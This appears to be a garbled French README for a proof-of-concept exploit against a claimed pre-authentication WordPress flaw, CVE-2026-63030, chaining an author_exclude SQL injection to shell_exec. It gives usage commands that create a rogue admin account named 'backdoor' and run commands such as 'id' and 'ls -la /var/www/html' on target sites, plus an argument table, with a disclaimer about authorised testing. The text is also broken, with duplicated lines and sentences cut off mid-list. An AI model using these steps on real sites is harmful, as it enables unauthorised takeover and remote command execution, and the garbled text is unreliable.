
Exploit de preuve de concept pour CVE-2026-63030, une vulnérabilité de pré-authentification dans WordPress (versions 6.9.0 à 7.0.1).
Exploit de preuve de concept pour CVE-2026-63030, une vulnérabilité de pré-authentification dans WordPress (versions 6.9.0 à 7.0.1). Il combine :
author_excludepython3 cve_2026_63030_exp.py --url http://target-wordpress.com/ --command "whoami"
# Auto-exploit with random admin credentials and run 'id'
python3 exploit.py --url http://192.168.1.100/wordpress/
# Custom admin and command
python3 exploit.py --url https://vuln-site.com/ --username backdoor --password 'H4ckMe!' --command 'ls -la /var/www/html'
author_exclude malveillant, exploitant la confusion de routes pour exécuter une requête UNION.shell_exec().Ceci est uniquement une preuve de concept.
Il est destiné à :
Ne l'utilisez pas contre des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas d'autorisation écrite explicite de tester. Les auteurs déclinent toute responsabilité en cas d'utilisation abusive.
wp-config.php durci, l'injection SQL peut échouer.DISALLOW_FILE_MODS et DISALLOW_UNFILTERED_HTML dans la configuration de la cible.| Argument | Description |
|---|
--url | URL racine WordPress de la cible (obligatoire) |
--username | Nom d'utilisateur admin à créer (généré automatiquement si omis) |
--password | Mot de passe admin (généré automatiquement si omis) |
--email | Adresse e-mail de l'admin (générée automatiquement si omise) |
--command, -c | Commande à exécuter via le plugin (défaut : id) |
--post-id | Spécifier l'ID d'un article publié (auto-détecté si omis) |
--timeout | Délai d'expiration HTTP en secondes (défaut : 60) |